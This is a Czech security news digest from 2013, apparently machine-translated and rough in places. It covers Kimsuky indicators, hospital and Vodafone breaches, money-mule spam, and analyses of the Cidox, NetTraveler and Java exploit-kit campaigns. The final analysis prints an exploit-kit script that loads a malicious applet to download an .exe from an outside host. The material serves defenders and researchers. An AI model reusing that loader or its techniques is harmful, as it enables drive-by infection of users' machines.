C: \ Windows \ weoig.log
C: \ Windows \ data.dat
C: \ Windows \ sys.log
C: \ Windows \ PcMon.exe
C: \ Windows \ Update.exe Google
C: \ Windows \ ReadMe.log
C: \ Windows \ msdatt.bat
C: \ Windows \ msdatl3.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msdmeng.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ xmlrwbin.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msdapml.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ sqlsoldb.exe
C: \ Program Files \ Common Files \ System \ Ole DB \ oledjvs.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ oledvbs.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msolui80.inc
C: \ Program Files \ Common Files \ System \ Ole DB \ msdaipp.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ msdaerr.cnt
C: \ Program Files \ Common Files \ System \ Ole DB \ sqlxmlx.inc
<Hangul Plný path> \ HncReporter.exe
Související MD5:

3baaf1a873304d2d607dbedf47d3e2b4
3195202066f026de3abfe2f966c9b304
4839370628678f0afe3e6875af010839
173c1528dc6364c44e887a6c9bd3e07c
191d2da5da0e37a3bb3cbca830a405ff
5eef25dc875cfcb441b993f7de8c9805
b20c5db37bda0db8eb1af8fc6e51e703
face9e96058d8fe9750d26dd1dd35876
9f7faf77b1a2918ddf6b1ef344ae199d
d0af6b8bdc4766d1393722d2e67a657b
45448a53ec3db51818f57396be41f34f
80cba157c1cd8ea205007ce7b64e0c2a
f68fa3d8886ef77e623e5d94e7db7e6c
4a1ac739cd2ca21ad656eaade01a3182
4ea3958f941de606a1ffc527eec6963f
637e0c6d18b4238ca3f85bcaec191291
b3caca978b75badffd965a88e08246b0
dbedadc1663abff34ea4bdc3a4e03f70
3ae894917b1d8e4833688571a0573de4
8a85bd84c4d779bf62ff257d1d5ab88b
d94f7a8e6b5d7fc239690a7e65ec1778
f1389f2151dc35f05901aba4e5e473c7
96280f3f9fd8bdbe60a23fa621b85ab6
f25c6f40340fcde742018012ea9451e0
122c523a383034a5baef2362cad53d57
2173bbaea113e0c01722ff8bc2950b28
2a0b18fa0887bb014a344dc336ccdc8c
ffad0446f46d985660ce1337c9d5eaa2
81b484d3c5c347dc94e611bae3a636a3
ab73b1395938c48d62b7eeb5c9f3409d
69930320259ea525844d910a58285e15
Názvy služeb vytvořených malware:

DriverManage
WebService
WebClientManager
Remote Access Service
Zjistíme, jak těmto hrozbám Trojan.Win32.Kimsuky kromě upravených týmu Viewer komponent klienta, které jsou zjištěny při Trojan.Win32.Patched.ps .


Bulovku napadli hackeři, nemocnice se raději odřízla od sítě

13.9.2013 Hacking | Incident
Pražskou nemocnici Na Bulovce v noci na čtvrtek napadli hackeři. Podle mluvčího zdravotnického zařízení Martina Šalka se ale k datům pacientů nedostali. Bulovka zajistila speciální lékařská vyšetření, běžné případy záchranka vozila rovnou do jiných nemocnic.
Kvůli bezpečnosti byl od 03.00 do 11.00 vypnut vnitřní informační systém. Ten už ale funguje. Připojení na internet chce nemocnice obnovit ještě ve čtvrtek. Bulovka kvůli případu podá oznámení na neznámého pachatele. Spolupracuje také s Národním bezpečnostním úřadem.

„Dnes (ve čtvrtek) ve 03.00 došlo k útoku zvenčí na nemocniční systém, přičemž informatik mající službu nebezpečí včas rozpoznal, odpojil nemocnici od vnějšího světa a odpojil i jednotlivá pracoviště mezi sebou, tedy vnitřní informační sítě, aby data nebyla poškozena nebo smazána,” řekl Šalek.

Výpadek podle něj nemocniční provoz nijak zásadně neohrozil, péče byla poskytována, jen „procesy se trošku zpomalily”, protože kliniky si nemohly předávat výsledky vyšetření. Kapacita přístrojů tak byla omezená, nijak se to ale na počtu ošetřených neprojevilo.

Vyšetřeni byli podle Šalka na speciálních CT i tři pacienti, které přivezla na Bulovku záchranná služba, protože se nepodařilo domluvit CT vyšetření v jiné pražské nemocnici.

Někteří pacienti z ambulancí ORL se ze čtvrtka museli přeobjednat na jiný den.

Problémy se Pražanů výrazně nedotkly
Mluvčí záchranné služby Jiřina Ernestová řekla, že po 08.00 oznámila Bulovka dispečinku záchranářů, že má problém s počítačovým připojením.

„Pro Pražany kvůli výpadku počítačů na Bulovce žádné omezení zdravotní péče nevzešlo, protože ty, kteří potřebovali speciálně jejich vybavení, jsme tam převezli a ostatní jsme vezli do jiných nemocnic,” řekla. Je to podle ní standardní postup, když v některé nemocnici dojde k technické závadě, nastane stop stav či o prázdninách odstávka.

Šalek dodal, že hned po odhalení útoku nemocnice informovala ministerstvo zdravotnictví jako svého zřizovatele a požádala záchranáře, aby, pokud to bude možné, vozili nemocné do jiných nemocnic.

Od 11.00 vše funguje, vnitřní systém předává snímky a zprávy mezi jednotlivými pracovišti. Nemocniční internet sice ještě nefunguje, neznamená to žádné ohrožení. Telefony fungují, pacienti mohou pro komunikaci a dotazy využít místo internetu Facebook a Twitter. Internet by měl být funkční ještě v průběhu čtvrtka, shrnul Šalek.


Hacker ukradl údaje o dvou miliónech zákazníků Vodafonu v Německu

13.9.2013 Incident | Hacking | Hrozby
Neznámý hacker získal přístup na jeden ze serverů mobilního operátora Vodafone v Německu a ukradl osobní data o zhruba dvou miliónech zákazníků. Zástupci firmy to oznámili ve čtvrtek.
Vodafone Deutschland, který je dceřinou společností britské Vodafone Group, má v Německu více než 32 miliónů zákazníků využívajících mobilní služby.
Hacker se dostal ke jménům zákazníků, adresám a údajům o bankovních účtech. Hesla nebo bezpečnostní čísla ale nezískal. Podle společnosti není možné, že by mu údaje k něčemu mohly být.

„Tyto údaje lze stěží použít k získání přímého přístupu na bankovní účty dotčených klientů,” uvedla podle agentury Reuters společnost v prohlášení.

Útok provedl administrátor spolupracující firmy
Zástupci Vodafonu Deutschland sdělili, že útok provedl administrátor počítačové sítě, který pracoval pro jinou společnost spolupracující s Vodafonem. Jeho totožnost ale zatím není známa, uvedla agentura AP.

Společnost na vyšetřování případu spolupracuje s policií. Také uzavřela cesty, kterými se hacker k jejím serverům dostal. Zákazníky přitom varovala, aby si dávali pozor na nevyžádané e-maily nebo telefonáty od lidí, kteří by mohli chtít ukradené údaje zneužít.

Vodafone Deutschland, který je dceřinou společností britské Vodafone Group, má v Německu více než 32 miliónů zákazníků využívajících mobilní služby.


Mule Flood v Japonsku

6.9.2013 Spam | Hacking

Peníze emaily mezek náboru nejsou ničím novým, po celá léta byly tyto nevyžádanou poštou se po celém světě. Co je nového, i když je nedávná vlna zaměřená na "anglicky mluvících japonských obyvatel." Začalo to na konci července a my jsme obdrželi stovky těchto tématických nevyžádaných e-mailů od té doby.

Obsah obvykle slibuje snadnou práci, vyžadující jen několik hodin týdně s velmi málo dalších požadavků.

Pravděpodobně to spam vlna nebyla příliš úspěšná. Jedním z možných vysvětlení spočívá v tom, že mnoho japonských lidí, které znám jednoduše Koš anglické e-maily, pokud nejsou běžně pracují s nimi. Také, jako v našem případě, že většina z těchto e-mailů filtruje a umístí do koše do bezpečnostního softwaru již. Dalším důvodem může být to, že Japonci, kteří skutečně mluví anglicky jsou dost chytří na to cítit něco phishy zde.

A když už mluvíme o phishy ... vlastně phishing a peníze muly spolu úzce souvisejí. V phishingu ukrást přihlašovací údaje pro online bankovnictví účty a je to. Získané informace se pak prodává na další tým zločinců, personalisty peníze mezek. Jejich úkolem je "hotovost" ukradené účty.

Co se stalo na konci srpna byla první _ever_ (?) Vzhled e-mailů peněz mule náboru v japonském jazyce. V e-mailu, osoba jménem "Martin" vysvětluje stručně o této nové pracovní místo se odměn ~ 600,000 jenů. Všechny e-maily tohoto druhu přišel z adresy jako "Blah.Blah @ outlook.com".

Vzali jsme příležitost odpovědět na některé z nich ("Prosím, řekni mi víc ..."), aby bylo možné pozorovat, co se bude dít.

Netrvalo příliš dlouho, než jsme se dostali odpovědi - e-mail od "Martin", jak dobře, ale z úplně jiného e-mailovou adresu a "poradenské" firmy údajně se sídlem ve Švédsku. Ze záhlaví e-mailu jsme dospěli k závěru, že dva servery používané pro odesílání e-mailů se nachází v Rusku. Jednou z oblastí je zaregistrován (co vypadá jako) osoby v Itálii, druhá v USA.

Nyní byl obsah i dvojjazyčné a připojené údaje obsahovala "Contrakt" (sic) a některé další doklady, které vysvětlují, jak je tato Celý projekt by měl fungovat. Dále jsme vytvořili nějaké nesmyslné otázky odpověď, která vedla k určité e-mailové ping-pong, což nám umožňuje shromáždit více informací o odesílateli (y). Tento "zaměstnavatel" radil nám vytvořit nový bankovní účet ("Předvolby: Resonabank, Sevenbank, Shinseibank ...") a zahrnuje další přílohu k vyplnění náš bankovní informace.

A to je vše, co jsme mohli jít, protože dalším krokem by bylo přijímat (ukradené) peníze na tento účet s konečným účelem předání asi 90% přijatého peněz prostřednictvím bankovního převodu a udržování zbývající částku jako náš poplatek.

Můžeme jen doporučit všem ignorovat přístupy tohoto druhu; že peníze mezek není žádná legrace, ale je to velmi závažný trestný čin a rychle vstupenek na policejní stanici.


Cidox Trojan Vtipy HTTP Hlavička hostitele se vyhnout detekci

4.09.2013 Viry | Hacking

V poslední době jsme zaznamenali značný počet vzorků generujících nějaký zajímavý síťový provoz prostřednictvím naší automatizované rámce. Síť HTTP generovaný vzorek obsahuje několik zajímavých parametrů, názvy jako "AV" (a pro antivirus?) A "& vm =" (VMware?), Obdržíme jako odpověď se zdála být šifrována, což mě upozornil. Také všechny síťový provoz obsahoval stejný záhlaví hostitele ukazující na metrika.yandex.ru. Tyto vzorky se ukázalo být ve vztahu k Cidox Trojan rodiny. Zde je paket Wireshark zachycení požadavku GET: cidox_http_traffic Dalo by se okamžitě k závěru, že název hostitele v požadavku GET je viník a může být ohrožena, nebo je útočník doména, která není pro tento vzorek. Doména vypadal jako legitimní, protože yandex.ru je největší vyhledávač v Rusku. Chcete-li ověřit, rychle jsem zkontroloval zachycování paketů na žádost DNS a IP adresy (kde byl poslán požadavek GET), se liší od adresy IP metrika.yandex.ru. To mi říká, že hlavičky hostitele v požadavku GET je falešné a musí být pevně v těchto vzorcích. Viděli jsme tento trik používá nedávno malware autorů, v nichž jsou HTTP hlavičky hostitele falešnou poukázat na legitimní domén vyhnout detekci na základě hlaviček hostitele nebo vyhnout se výzkumníkům nebo automatizovaných nástrojů. Odpověď ze vzdáleného serveru byl šifrována, takže jsem se rozhodl podívat se do něj. Škodlivý binární používá vlastní balírny a nebylo těžké vybalit. unpack_data_mz Po vybalení můžete vidět několik zajímavých řetězce v binární níže: cidox_strings_unpacked Tento binární kontroluje, zda je vzorek běží pod VMware a také hledá antimalware služeb. Pamatujte si, že síťový provoz je uvedeno výše obsahuje "& vm =" a "& AV =" parametry. Můžeme uzavřít tento binární nastaví tyto parametry na základě předchozích kontrol. Mohl bych pokračovat dál a dál v tomto blogu, ale kvůli tobě se budu soustředit jen na několik důležitých položek. Binární začíná svou hlavní činnost podle způsobu procesu náhradní k přepsání paměti o probíhajícím procesu s nebezpečným spustitelný soubor. Binární vytváří "explorer.exe" proces pozastaven režimu a mapy paměti procesu s vlastním kódem, viz následující: cidox_create_process To pak spustí namapované binární kód s "ResumeThread" postupu. Binární další kapky několik souborů: dropped_explorer Stanoví klíč registru s hodnotou, která je cesta k DLL tak, aby každý proces pomocí User32.dll načte tuto knihovnu. Také to klesne některé konfigurační soubory v adresáři Cookies: dropped_cf_files Soubor CF je šifrována, a podíváme se na zašifrovaný soubor krátce, ale nejprve musíme vidět HTTP hlavičky generované tímto binární. Binární shromažďuje informace, jako jsou prohlížeče, operační systém, antimalware a VMware kontroly, verzi operačního systému (32 nebo 64 bit), atd. a připravuje požadavku HTTP GET. Zde je screenshot z požadavku GET záhlaví v procesu: cidox_get_request_header Jak jsme tušili, binární má pevně záhlaví hostitele, který ukazuje na metrika.yandex.ru, ale skutečná doména je odlišná. To může přijít z vynechaného šifrovaného konfiguračního souboru. Odpověď ze serveru jsou šifrovány takto: cidox_encryted_response Binární používá vlastní Tiny Encryption Algorithm (TEA) k šifrování a dešifrování dat. Zde byl hovor z dešifrovat odpověď ze serveru: cidox_tea_call TEA používá 128bitový klíč k šifrování a dešifrování své rutiny. Binární používá dva pevně klíče: jeden pro dešifrování dat pochází ze serveru a druhé uchovává data v zašifrované podobě, jak je uvedeno v předchozím obrázku. Je snadné zjistit Kódovací metoda založená na několika konstantní hodnoty zjištěné v algoritmu. Zde je snímek TEA kód: tea_decryption_code Po dešifrování odpovědi vyklube konfigurační soubor obsahující názvy domén, jak je vidět níže: cidox_decrypted_config Binární informace ukládá v zašifrované podobě v souboru cf, jak jsme viděli dříve. Binární stáhne a nainstaluje další škodlivý program z jiného serveru s názvem v konfiguračním souboru. Zde je požadavek: http_objects Žádost o dldc.php odešle zašifrovanou odpověď, která obsahuje jiný spustitelný soubor. dldc_exe Nebudeme zacházet do podrobností staženého binární. Útočník za tento trojan shromažďuje velké množství informací prostřednictvím požadavku GET, včetně Antimalware nebo VMware kontroly. Binární umožňuje detekci obtížné pro automatizované procesy nebo EZS nebo preventivní ochranné systémy, pomocí podvržené názvů hlavičky hostitele a vlastní Čaje pro šifrování dat. Jak jsme se dozvěděli, nemůžeme spoléhat pouze na hostitele záhlaví HTTP posoudit, zda název domény použitý v HTTP hlavicce je škodlivý.


NetTraveler Is Back: The 'Red Star' APT se vrací s novým kouskům

3.9.2013 Zdroj: Kaspersky Hacking | Počítačový útok

NetTraveler, které jsme popsali v hloubce v předchozím příspěvku, je APT, aby byly zavirované stovky vysokých profilových obětí ve více než 40 zemích. Známé cíle NetTraveler (také známý jako "Travnet" nebo "Netfile") patří tibetské / ujgurské aktivisty, podniky ropného průmyslu, vědeckých výzkumných center a ústavy, vysoké školy, soukromé společnosti, vlády a vládní instituce, velvyslanectví a vojenských dodavatelů.

V průběhu minulého týdne bylo několik kopí-phishing e-maily odeslané na více Ujgurů aktivistů. Zde je příklad:

Hrubý překlad:

"Mluvčí WUC učinil následující prohlášení o masakru v zemi Karghiliq. K laskavou pozornost každého. "

Obsahuje odkaz na stránku, údajně na World Ujgurů stránkách kongresu. Nicméně, skutečný stránku odkaz vede na známou NetTraveler související doméně "weststock [dot] org".

Zde je obsah stránky přitažené za vlasy z této URL:

Tento jednoduchý HTML načte a spustí Java applet s názvem "new.jar" ( c263b4a505d8dd11ef9d392372767633 ). "New.jar" je exploit pro CVE-2013-2465, velmi nedávné chyba ve verzích Java 5, 6 a 7, která byla stanovena Oracle v červnu 2013. Je detekován a blokován produktů Kaspersky druhově jako "HEUR: Exploit.Java.CVE-2013-2465.gen".

Užitečné zatížení exploitu je soubor s názvem "file.tmp" ( 15e8a1c4d5021e76f933cb1bc895b9c2 ), který je uložen v JAR. Jedná se o klasický NetTraveler backdoor kapátko (produkty Kaspersky zablokovat jako "Trojan-Dropper.Win32.Dorifel.adyb"), který sestavuje na "Pon 30.květen 2013 03:24:13", pokud máme věřit záhlaví PE časové razítko.

Tato varianta NetTraveler připojuje k dříve neznámé velení a řízení serveru při "hxxp :/ / worldmaprsh [dot] com / GZH / nettr / filetransfer [dot] asp", pořádané na IP 198.211.18.93. IP se nachází v USA, u "Multacom Corporation" a jsou použity výhradně hostit tuto C2:

Velení a řízení server je aktivní a provozu v době psaní tohoto blogu, přijímání kradených dat z obětí.

NetTraveler je Zalévání díry útok Kromě spearphishing e-maily, zalévání děr útoky se staly další populární způsob, jak zaútočit na nic netušící oběti, které APT operátorů. Není snad žádným překvapením, že NetTraveler útoky jsou nyní používá tuto metodu. Minulý měsíc jsme zachytili a zablokoval celou řadu infekčních pokusů od známého NetTraveler související domény na "weststock [dot] org". K přesměrování se objevily přijít z jiného Ujgurů související obsah www stránek patřících k "islámské asociace východní Turkestánu":

Rychlý pohled na webu HTML kódu ukazuje injekci iframe společné na nebezpečné webové servery:

HTML stránka, na "weststock [dot] org" odkazuje IFRAME obsahoval další škodlivý aplet s názvem "ie.jar".

Závěry Bezprostředně po ozáření obyvatelstva z NetTraveler operací , útočníci vypnutí všech známých C2S a přesunula na nové servery v Číně, Hongkongu a Tchaj-wanu. Nicméně, oni také pokračovaly útoky bez překážek, stejně jako současný případ ukazuje to.

Použití exploitu Java pro CVE-2013-2465 spolu s zalévání děr útoků je nové, dosud nepoznané vývoj pro skupinu NetTraveler. To má samozřejmě vyšší úspěšnost než dokumenty e-mailové CVE-2012-0158 Exploit sužovaných, což byl oblíbený způsob útoku až do současnosti. Odhadujeme, že novější využije budou integrovány a používány proti skupinových cílů.

Doporučení, jak zůstat v bezpečí z těchto útoků:

* Aktualizace Java na nejnovější verzi, nebo pokud nechcete použít Java, odinstalujte ho. * Aktualizace Microsoft Windows a Microsoft Office na nejnovější verze. * Aktualizace veškeré další software třetích stran, jako je například Adobe Reader. * Používejte bezpečný prohlížeč, jako Google Chrome, který má rychlejší rozvoj a slepování cyklus než Internet Explorer společnosti Microsoft. * Buďte opatrní při klikání na odkazy a otevírání příloh od neznámých osob. Zatím jsme nepozorovali použití na zero-day zranitelností Skupinou NetTraveler; bránit proti těm, ačkoli záplaty nepomohou, technologie, jako AEP (Automatic Exploit Prevention) a DefaultDeny může být docela účinné v boji proti Apts .


Vývojáři pronikli do DropBoxu a ukázali cestu k datům uživatelů

Bezpečnost DropBoxu není 100%, lze obejít i jeho dvoufázové ověřování a vstoupit do komunikace SSL mezi servery DropBoxu.

Hacking | Zranitelnosti

V rámci konference USENIXU 2013 byl uveřejněn článek dvou vývojářů zaměřený na techniky překonávající zabezpečení DropBoxu. Podle autorů jsou „tyto techniky poměrně obecné a věříme, že v budoucnosti pomohou vývoji softwaru, testování a dalšímu výzkumu problémů bezpečnosti.“

DropBox, který má dnes více než 100 milionů uživatelů, kteří nahrávání více než miliardu souborů denně, prohlašuje, že článek neukázal na žádnou konkrétní zranitelnost jeho serverů.

Podle mailu, který zaslal tiskový mluvčí společnosti redakci amerického Computerworldu: „Oceňujeme příspěvky výzkumníků a vůbec všech, kteří pomáhají udržovat DropBox bezpečným. V konkrétním případě, který byl uveřejněn, by muselo nejprve dojít k průniku do počítače uživatele tak, že by byl zneužitelný celý, nikoli pouze pro účet DropBoxu.“

Oba autoři textu, Dhiru Kholia, (z projektu Openwall) a Przemyslaw Wegrzyn (CodePainters) tvrdí, že se jim podařilo pomocí reverzního inženýrství získat zdrojový kód DropBoxu, jehož aplikace byla napsaná v jazyce Python. „Naše práce ukazuje interní API používaná klientem Dropboxu a umožňuje jednoduše napsat vlastní, přenositelnou verzi klienta. Dále předvádíme, jak lze obejít dvoufázové ověřování DropBoxu a jak získat přístup k datům uživatele. Jde o novou obecnou techniku, jak analyzovat aplikace napsané v Pythonu, která se neomezuje pouze na produkty DropBoxu.“

V publikovaném textu se dále detailně popisuje, jak byli autoři schopni rozbalit, rozšifrovat a dekompilovat DropBox. Samozřejmě, jakmile je k dispozici vlastní verze zdrojového kódu, lze dále studovat, jak aplikace funguje. Výsledkem je schopnost získávat data z tunelu SSL, kterým komunikuje klient DropBoxu, ale daná metoda byla úspěšně otestována i na dalších komerčních řešeních.

Použita byla takzvaná monkey-patch, což je metoda rozšiřování nebo modifikace spuštěného kódu interpretovaných jazyků beze změny původního zdrojového kódu. V tomto případě konkrétní implementace dokázala upravit chování klienta DropBoxu, aniž by tento klient dokázal zjistit průnik do vlastního kódu nebo odesílaných dat.

„Doufáme, že naše práce bude inspirovat komunitu věnující se bezpečnosti IT, aby napsala vlastního klienta pro službu DropBoxu, s otevřeným zdrojovým kódem, který by pomohl i vlastní platformě DropBoxu a jejím uživatelům. Doufáme, že na naši práci navážou další výzkumy i pro jiná cloudová úložiště.“


NY Times a Twitter opět pod útokem zločinců

K útokům na webové stránky deníku New York Times a sociální síť Twitter se přihlásila Syrská elektronická armáda.

Hacking

Útočníkům se podařilo pozměnit registrační údaje domén amerických internetových deníků NY Times a Huffington Post, čímž je odstavili na několik hodin z provozu. Napadena byla také mikroblogovací služba Twitter, která ale zůstala funkční.

Za útokem podle všeho stojí skupina, která si přezdívá Syrská elektronická armáda, což je organizace podporující syrského prezidenta Bašára al-Asada.

Jde o dosud největší útok provedený touto skupinou. V uplynulých měsících se hackeři zaměřili na velké mediální společnosti jako Financial Times, Washington Post, CNN nebo BBC. Poslední útok měl však mnohem déle trvající následky.

Napadené domény měla ve své správě australská společnost Melbourne IT. Útočníci získali přístup do jejího systému a změnili nastavení DNS. Pokud jste tak do adresního řádku prohlížeče zadali například nytimes.com, místo stránek amerického deníku jste se dostali na web Syrské elektronické armády.

V případě Twitteru hackeři zneužili doménu twimg.com, kterou sociální síť používá pro ukládání obrázků. Zatímco Twitter tak zůstal v provozu, některé stránky na twimg.com se nezobrazovaly správně.

Australský registrátor dává zneužití adres za vinu třetí straně – firmě, která přes systém společnosti prodává domény. Od této firmy měla Syrská elektronická armáda získat přístupové údaje k editaci DNS. „Pokud máte platné jméno a heslo, náš systém předpokládá, že jste oprávněný majitel a uživatel doménového jména,“ řekl ředitel Melbourne IT Theo Hnarakis.

V době výpadku pokračoval New York Times v publikování svých článků prostřednictvím profilu na Facebooku. Společnost mezitím varovala své zaměstnance, aby byly opatrní při e-mailové komunikaci, dokud se situace nevyřeší.


Anonymous reagují na tvrzení FBI o jejich likvidaci

Skupina hackerů Anonymous uvolnila tisíce citlivých údajů jen několik dní po tom, co FBI vydala prohlášení o jejich likvidaci.

Hacking

Minulý týden Austin Berglas, ředitel kybernetické divize FBI v New Yorku, poskytl rozhovoru novinám Huffington Post. Podle něj vyšetřování FBI vedlo k řadě zatčení mezi členy Anonymous a k omezení jejich činnosti. „Hnutí sice existuje a můžete vidět nějaké jejich příspěvky na Twitteru, ale jeho členy neuslyšíte chlubit se velkými průniky. K žádným nedochází, protože se nám podařilo pacifikovat největší hráče...“

První reakcí na Twitteru, který je jakýmsi hlavním komunikačním kanálem většiny Anonymous, byl smích a řada vtipů, mnoho z nich srovnávalo podobné tvrzení s prohlášením Geroge W. Bushe v roce 2003 o dokončení mise v Iráku, které bylo poněkud předčasné a po kterém teprve došlo v konfliktu k většině úmrtí vojáků i civilistů.

Pro většinu pozorovatelů aktivit FBI a hackerů nebyl obsah rozhovoru se speciálním agentem velkým překvapením. Podle Gabrielly Colemanové, antropoložky specializující se na hackerství a aktivismus „Bitva mezi hackery a FBI se táhne velmi dlouho. A zatímco Anonymous se mohou vyjádřit kdykoliv, FBI musela být velmi opatrná a držet se zpátky. Dalo se čekat, že dříve nebo později se někdo z agentury rozhodne vystoupit ze svého zákopu a bude bojovat za její kredit.“

je pravda, že FBI dosáhla velkých úspěchů, zadržela řadu členů skupin LuizSec a AntiSec, které především v létě 2011 úspěšně útočily na řadu vládních organizací. Ale i přes vlastní prohlášení, že například LuizSec tvoří pouze sedm členů, bylo jejich podzemní hnutí podstatně rozsáhlejší.

To se ukázalo vzápětí po tom, co noviny přinesly zprávu o úspěších FBI. Anonymous reagovali uveřejněním řady dokumentů s tisící osobních informací o pracovních vládních agentur, včetně jejich telefonů. Na napadený web nahráli kompletní seznam pracovníků Banky federálních rezerv USA. Ta reagovala tvrzením, že tato data jsou zastaralá a pravděpodobně pocházejí z únorového útoku na systémy banky.

To samozřejmě nic nemění na faktu, že banka byla úspěšně napadena a že – stejně jako v jiných případech – se o úniku dat mohou organizace dozvědět mnohem později, pokud vůbec. Pro FBI je to zase poučením, že na vítězný taneček je vždy času dost. Anonymous i jiné skupiny nejsou jednoduše zasažitelné organizace, jejich aktivity jsou diverzifikované a svou pozornost mohou kdykoli zaměřit jinam.

Co se týká dnešní veřejnosti, tu v tomto okamžiku více než síťová bezpečnost pálí lidská práva a ochrana soukromí před aktivitou jistých vládních agentur. A kdybychom si mohli dovolit být ještě trochu více paranoidní, náhlé vítězné výkřiky FBI mohou být jen projevem pokračující snahy Spojených států od vlastních pochybných aktivit.


Anti-dekompilace techniky v škodlivým aplety Java

Hacking | Zranitelnosti

 Krok 1: Jak to začalo Když jsem vyšetřoval případ Trojan.JS.Iframe.aeq (viz blogpost <http://www.securelist.com/en/blog?weblogid=9151>) jeden ze souborů klesl o Exploit Kit byl Applet využití Zranitelnost:

<script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Krok 2: První analýza Takže v podstatě jsem rozepnul. Nádobu a se podívat pomocí JD-GUI, dekompilaci java. Jednalo se o výsledné třídy uvnitř jar soubor.:

Názvy tříd jsou divní, ale nic neobvyklého. Obvykle Manifest uvádí vstupní bod (hlavní třída), v appletu. V tomto případě nedošlo k žádnému zjevnému, ale my jsme mohli vidět v appletu volání z HTML:

< applet Archiv = "dyJhixy.jar" code = "QPAfQoaG.ZqnpOsRRk" > << balíček a třída vykonat < param hodnota = "http://

Třetí parametr byl. Exe, že applet klesá. Nebylo skutečná potřeba prozkoumat některou hlouběji jen proto, aby získali přehled o tom, co dělá applet. Nicméně bod, zde bylo analyzovat chybu, která toto. Jar využije.

Na tomto místě bych měl říci, že jsem zaujatý. Četl jsem zprávu McAfee o podobné kampaně s použitím stejného Exploit soupravy. V této zprávě se říká, že malware se snížily o tomto HTML uvnitř byla stavebnice CVE-2013 - 0422.

Obvykle je první vodítko, které by mohly potvrdit, to by bylo verdikty z AV dodavatelů, ale tentokrát to nebyl případ:

https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/

Ok, takže se pojďme podívat na rozklad kódu, počínaje vstupním bodu. Můžeme potvrdit, že třída ZqnpOsRRk provádí applet:

Balíček QPAfQoaG; import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk rozšiřuje aplet Ale rychle vidíme, že něco nefunguje. Jména tříd a metod, které jako náhodné řetězce popletl, ale to je čeho se bát. V tomto případě však vidíme, že decompiler ukazuje podivnou "kód":

veřejné ZqnpOsRRk () { (-0.0D); návrat; 1L; 2; 1;} Nebo to není schopen dekompilovat metody třídy přímo a je jen ukazovat jako bytecode komentářů:

public void ttiRsuN () hodí Throwable { / / Byte kód: / / 0: 10 ldc_w / / 3: iconst_4 / / 4: ineg / / 5: iconst_5 / / 6: ineg / / 7: POP2 / / 8: lconst_0 / / 9: POP2 Teď jsem začal přemýšlet, jak špatná je situace? Mohl bych ještě dostat dostatek informací, zjistit, které CVE je využíván tímto. Sklenice?

Čas na nějaké vážné kopání!

Začal jsem se přejmenovat tříd na základě jejich prvních písmen (ZqnpOsRRk do Z, CvSnABr na C, atd.) a aby odpovídaly metody s tím, co jsem si myslel, že dělají. Je to podobně jako jakýkoli RE pomocí IDA.

Tam byla spousta "divné" kódu kolem, který dostal podivné výklady z Decompiler. Rozhodl jsem se odstranit ji uklidit úkolu.

Samozřejmě, že existuje riziko, že bych mohl smazat něco důležitého, ale tentokrát to vypadalo jako mylné interpretaci bytecode, mrtvého kódu a nepoužitých proměnných. Tak jsem odstranil věci jako:

public static String JEeOqvmFU (třída arg0) { (-5), (-2.0F) return 1;} takhle Tam, kde jsem viděl komentoval bytecode (ne rozložit JD-GUI), smazal jsem všechno, ale odkazy na funkce / třídy.

Na konci jsem měl mnohem čistší kód, ale byl jsem velmi znepokojen, že bych mohl chybět důležité části. Například jsem měl postupů, které se právě vrátil NULL, funkce, která jen deklarované proměnné, nepoužité proměnné, atd.

Kolik z toho, jestliže některý, byl součástí expolit a kolik bylo jen špatně vykládáno kód?

Alespoň jsem byl schopný dostat něco užitečného po vyčištění kódu. Byl jsem schopen lokalizovat funkce slouží k deobfuscate řetězce:

public static String nwlavzoh (String mbccvkha) { byte [] = arrayOfByte1 mbccvkha.getBytes (); byte [] = new byte arrayOfByte2 [arrayOfByte1.length]; for (int i = 0; i <arrayOfByte1.length, i + +) arrayOfByte2 [i] = ((byte) (arrayOfByte1 [i] ^ 0x44)); return new String (arrayOfByte2); } Ne tak docela věda. Teď jsem mohl překládat všechny řetězce, ale já jsem ještě neměl jasnou představu o tom, co se děje v tomto. Sklenice.

Krok 2: Různé strategie Vidět, že kód nebyl správně rozložit jsem si vzpomněl, že zjistit, které zranitelnost je využívána nemáte opravdu potřebují plně předmětem rozkladu kód. Nalezení správné stopy lze odkázat vás na správnou exploitu. Na tomto místě bych si myslel, že by to mohlo být CVE-2013-0422, tak jsem se rozhodl získat další informace o této chybě, a uvidíme, jestli bych mohl najít něco v kódu potvrdit.

Tento CVE byl objeven v lednu 2013. Oracle měl špatný čas jen tehdy, a krátce nato několik dalších Java chyby byly vystaveny.

Stáhnul jsem si několik ukázek z VirusTotal s tímto CVE. Všichni byli snadno rozložit a viděl jsem několik způsobů, jak implementovat tuto chybu zabezpečení. Ale tam byl žádná velká stopa.

Rozhodla jsem se také vyzkoušet několik dalších dekompilátory, ale pořád ještě žádné výsledky.

Nicméně, když se vezme druhý pohled na výsledky běží dnes zastaralé JAD jsem viděl, že dekompilován kód byl docela odlišný od jednoho z JD-GUI, i když to bylo stále neúplné a nečitelné.

Ale byly tam různé hovory s popletl strun deobfuscation funkce.

